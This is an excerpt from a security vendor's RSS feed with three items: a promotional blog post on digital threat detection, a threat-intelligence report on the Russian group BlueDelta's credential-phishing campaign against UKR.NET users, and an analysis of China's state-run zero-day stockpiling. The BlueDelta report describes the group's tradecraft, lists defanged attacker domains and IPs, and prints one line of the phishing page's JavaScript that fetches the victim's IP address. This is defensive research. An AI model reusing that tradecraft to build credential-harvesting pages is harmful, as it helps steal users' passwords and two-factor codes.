          <li><strong>Download the</strong> <strong><a href="https://www.recordedfuture.com/ko/resources/guides/proactive-ransomware-mitigation">Proactive Ransomware Mitigation eBook</a></strong> for actionable strategies to identify, investigate, and prioritize cyber threats.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_13d33e30a4d6ff2bf805413e36ff4532517bc417e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Threat Detection Tools & Best Practices]]></title>
            <link>https://www.recordedfuture.com/ko/blog/digital-threat-detection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/digital-threat-detection</guid>
            <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore digital threat detection tools and learn best practices to identify, analyze, and neutralize digital threats before they impact your business.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Digital threats now originate far beyond the perimeter.</strong> Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.</li>
          <li><strong>Context is the foundation of effective detection.</strong> Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.</li>
          <li><strong>Modern digital threat detection (DTD) requires visibility across the external digital environment.</strong> The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.</li>
          <li><strong>Analysts need automation to keep pace.</strong> High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.</li>
          <li><strong>Recorded Future operationalizes intelligence at enterprise scale.</strong> The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.</li>
        </ul>
        <h2>Why Digital Threat Detection Requires a New Approach</h2>
        <p>Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:</p>
        <ul>
          <li>High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.</li>
          <li>Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.</li>
          <li>Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.</li>
          <li>Alert fatigue from manually sifting through noise to find high-risk signals.</li>
        </ul>
        <p>As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.</p>
        <p>Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.</p>
        <p>The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.</p>
        <h2>Understanding the Modern Digital Threat Landscape</h2>
        <p>To <a href="https://www.recordedfuture.com/ko/blog/digital-risk-protection-overview">build an effective digital threat detection program</a>, security teams must understand where modern threats originate and how attackers operate.</p>
        <h3>Key Threat Vectors Beyond the Perimeter</h3>
        <h4>Leaked credentials and account takeover attempts (stolen identities)</h4>
        <p>Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.</p>
        <h4>Brand impersonation, domain spoofing, and phishing campaigns</h4>
        <p>Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.</p>
        <h4>Vulnerability exploitation and zero-day threats in the external attack surface</h4>
        <p>Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.</p>
        <h4>Dark web chatter and early warning signs of planned ransomware or DDoS attacks</h4>
        <p>Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.</p>
        <h2>Why an Intelligence-Driven Approach is Better</h2>
        <p>For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.</p>
        <p>Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors, infrastructure, and intent of adversaries operating across the <a href="https://www.recordedfuture.com/ko/blog/digital-risk-management-strategies">broader digital ecosystem</a>. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.</p>
        <p>The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.</p>
        <h2>Essential Digital Threat Detection Tools and Technologies</h2>
        <p>Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.</p>
        <h3>Threat Intelligence Platforms: The Engines of Context</h3>
        <p>No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.</p>
        <p>Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:</p>
        <ul>
          <li>Open web reporting</li>
          <li>Underground forums</li>
          <li>Dark web marketplaces</li>
          <li>Malware sandboxes</li>
          <li>Threat feeds</li>
          <li>Researcher data</li>
        </ul>
        <p>Once the data is normalized, the platform enriches it with context, such as:</p>
        <ul>
          <li>Relationships between indicators</li>
          <li>Associations with known threat actors</li>
          <li>Infrastructure reuse</li>
          <li>Activity targeting specific industries or regions</li>
        </ul>
        <p>This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.</p>
        <h3>Security Orchestration, Automation, and Response (SOAR)</h3>
        <p>While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.</p>
        <p>Key SOAR capabilities include:</p>
        <ul>
          <li><strong>Enriching alerts</strong> with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)</li>
          <li><strong>Blocking malicious indicators</strong> across firewalls, endpoints, cloud environments, and identity systems</li>
          <li><strong>Initiating takedown workflows</strong> for harmful domains or impersonation infrastructure</li>
          <li><strong>Coordinating actions</strong> across multiple security tools to ensure a unified response</li>
          <li><strong>Documenting each step</strong> of the investigation for reporting and compliance</li>
        </ul>
        <p>By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.</p>
        <h3>Endpoint Detection and Response (EDR) &amp; Security Information and Event Management (SIEM) Integration</h3>
        <p>EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.</p>
        <p>EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.</p>
        <p>Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.</p>
        <p>Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.</p>
        <h2>Overcoming the Analyst’s Biggest Pain Points</h2>
        <p>Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.</p>
        <h3>The Drain of Alert Fatigue and False Positives</h3>
        <p>High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.</p>
        <p>The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.</p>
        <h3>The Blind Spots of External Risk</h3>
        <p>Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.</p>
        <p>These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.</p>
        <h2>Recorded Future: Operationalizing Digital Threat Intelligence at Scale</h2>
        <p>Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.</p>
        <h3>Real-Time Context from the Intelligence GraphⓇ</h3>
        <p><a href="https://www.recordedfuture.com/ko/platform/intelligence-graph">The Intelligence GraphⓇ</a> addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:</p>
        <ul>
          <li>Open web</li>
          <li>Dark web marketplaces</li>
          <li>Malware repositories</li>
          <li>Technical feeds</li>
          <li>Network telemetry</li>
          <li>Closed underground forums</li>
        </ul>
        <p>No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.</p>
        <h3>Comprehensive Digital Risk Protection for External Threats</h3>
        <p>Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.</p>
        <p>Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.</p>
        <h3>Accelerating Time-to-Action through Integrated Intelligence</h3>
        <p>Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.</p>
        <p>An extensive ecosystem of pre-built integrations and flexible APIs connects directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.</p>
        <p>Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.</p>
        <p>This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&amp;CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.</p>
        <h3>Smarter, Faster Security Decisions</h3>
        <p>Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.</p>
        <p>By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.</p>
        <p>These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.</p>
        <p>Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how <a href="https://www.recordedfuture.com/ko/use-case/digital-risk">Recorded Future</a> can support your Digital Threat Detection strategy.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14639da492947ba40cd78b2b341750064fc2e01ca.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[BlueDelta’s Persistent Campaign Against UKR.NET]]></title>
            <link>https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Russia’s BlueDelta targets UKR.NET users with advanced credential-harvesting campaigns, evolving tradecraft, and multi-stage phishing techniques.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was July 30, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “<a href="https://www.recordedfuture.com/ko/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns</a>,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.</p>
        <p>Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript described in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.</p>
        <p>BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.</li>
          <li>The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.</li>
          <li>BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.</li>
          <li>Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.</li>
          <li>The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in <strong>Figure 1</strong>. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1aedf1a1ebaf322a2b9cea5d91b9c34059f89d679.png?width=750&amp;format=png&amp;optimize=medium" width="1575" height="1189" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)</em></p>
        <p>The malicious UKR.NET page had very similar functionality to that previously <a href="https://www.recordedfuture.com/ko/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">observed</a> by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to a fixed domain and high-port combination, <em>kfghjerrlknsm[.]line[.]pm[:]11962</em>, as shown in <strong>Figure 2</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11071d6fe28c7569a9a99c22d79c151693b79be2a.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1312" height="1600" />
        </p>
        <p><em><strong>Figure 2:</strong></em> <em>UKR.NET credential capture page JavaScript (Source: Recorded Future)</em></p>
        <p>The <em>line[.]pm</em> apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.</p>
        <p>At the time of analysis, the domain resolved to the IP address <em>18[.]157[.]68[.]73</em>, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.</p>
        <p>The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure <a href="https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF">in early 2024</a>.</p>
        <p>BlueDelta added new functionality to the page hosted on <em>kfghjerrlknsm[.]line[.]pm</em> to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in <strong>Figure 3</strong>.</p>
        <pre><code>var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
</code></pre>
        <p><em><strong>Figure 3:</strong></em> <em>Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)</em></p>
        <p>Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.</p>
        <p>On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain <em>5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net</em>.</p>
        <p>The apex domain <em>serveo[.]net</em> is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.</p>
        <p>In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain <em>jkbfgkjdffghh[.]linkpc[.]net</em>, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the <em>linkpc[.]net</em> domain resolved to the suspected ngrok IP address <em>3[.]67[.]15[.]169</em>.</p>
        <p>Additionally, BlueDelta added new first-stage redirection domains for two of the pages: <em>ukraine[.]html-5[.]me</em> and <em>ukrainesafe[.]is-great[.]org</em>. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains <em>html-5[.]me</em> and <em>is-great[.]org</em> are owned by the free hosting company Byet Internet Services.</p>
        <p>On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL <em>run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050</em>. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, <em>jkbfgkjdffghh[.]linkpc[.]net:17461</em>, as shown in <strong>Figures 4 and 5</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d3acfd7246af4bd0b054c43368a2c03afecd6e12.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1330" height="1600" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10c10db1d8d09ea494c21cd484e6f0e6adeccfc34.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1147" height="1600" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript code used to capture credentials (Source: Recorded Future)</em></p>
        <p>During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in <strong>Figure 6</strong>, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15c6aeca393c16eb8df14a4a9b2d04fd98ce25d63.png?width=750&amp;format=png&amp;optimize=medium" width="809" height="482" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages (Source: Recorded Future)</em></p>
        <p>Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:</p>
        <ul>
          <li>doads[.]org</li>
          <li>in[.]run</li>
          <li>t[.]ly</li>
          <li>tiny[.]cc</li>
          <li>tinyurl[.]com</li>
          <li>linkcuts[.]com</li>
        </ul>
        <p>In addition to link-shortening services, BlueDelta has employed free domains from the hosting provider InfinityFree or from Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot) for tier-two link redirection, in conjunction with link-shortening services. The following apex domains have been used in BlueDelta campaigns since 2023:</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_11203fd322f018c8d0b5f9b3c85f34cb897128ad0.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[China’s Zero-Day Pipeline: From Discovery to Deployment]]></title>
            <link>https://www.recordedfuture.com/ko/research/china-zero-day-pipeline</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/china-zero-day-pipeline</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[China is consolidating cyber power through zero-days. Explore how state control of vulnerabilities enables long-term strategic advantage.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <ul>
          <li>China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, <strong>signaling a continued effort toward stockpiling exploits</strong> for strategic or military advantage.</li>
          <li>The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) <strong>give the Chinese state first access and control over zero-days.</strong> Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.</li>
          <li>The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s <strong>consolidation of cyber capabilities</strong>, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.</li>
          <li>Defenders should adopt an “assume breach” posture and build for containment, implementing <strong>zero trust and layered defenses</strong> to limit attacker movement and impact after an exploit.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15e000151ffba5a4ff78475507202df421f0d8641.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="957" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>How China stockpiles vulnerabilities</em> <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3>Zero-Days as Strategic Weapons</h3>
        <p>A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.</p>
        <p>Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the <a href="https://trumpwhitehouse.archives.gov/sites/whitehouse.gov/files/images/External%20-%20Unclassified%20VEP%20Charter%20FINAL.PDF">Vulnerabilities Equities Process (VEP)</a>, which is designed to be transparent and generally favors disclosure to help maintain internet security.</p>
        <h3>China’s Vulnerability Management Regime</h3>
        <p>China’s vulnerability management system is <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">centralized</a> and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.</p>
        <ul>
          <li><strong>Mandatory Reporting</strong></li>
        </ul>
        <p>The RMSV (2021) <a href="https://www.chinalawtranslate.com/en/product-security-vulnerabilites/">requires</a> that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The <a href="http://www.npc.gov.cn/englishnpc/c2759/c23934/202112/t20211209_385109.html">Data Security Law</a> (DSL) and <a href="https://www.chinalawtranslate.com/en/national-intelligence-law-of-the-p-r-c-2017/#gsc.tab=0">National Intelligence Law</a> (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.</p>
        <ul>
          <li><strong>Incentivizing Compliance</strong></li>
        </ul>
        <p>This legal framework is reinforced through financial and professional incentives. The <a href="https://www.cnnvd.org.cn/">China National Vulnerability Database of Information Security</a> (CNNVD), managed by the Ministry of State Security (MSS), <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">offers</a> researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.</p>
        <ul>
          <li><strong>Talent Development and Recruitment Pipelines</strong></li>
        </ul>
        <p>China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">$2.75 million USD</a> prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.</p>
        <ul>
          <li><strong>Private Sector Relationships</strong></li>
        </ul>
        <p>China’s private sector also plays a <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/crash-exploit-and-burn/#conclusion">pivotal role</a>. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The <a href="https://www.recordedfuture.com/ko/research/attributing-i-soon-private-contractor-linked-chinese-state-sponsored-groups">i-SOON leaks</a> (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.</p>
        <h3>From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline</h3>
        <p>This centralized vulnerability ecosystem is producing <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">measurable results</a>, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited <a href="https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day">Ivanti VPN</a> and Trimble Cityworks (<a href="https://www.recordedfuture.com/ko/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis">1</a>, <a href="https://therecord.media/hackers-exploiting-trimble-cityworks-bug-used-by-local-govs">2</a>) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.</p>
        <p>China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms, that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13e7963e118803f4d4991324bfaa7fc0ddd6019fc.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Number of new CNNVD TSUs by month, June 2021 to July 2025</em> <em>(Source:</em> <em><a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">Natto Thoughts</a>)</em></div>
          </div>
        </div>
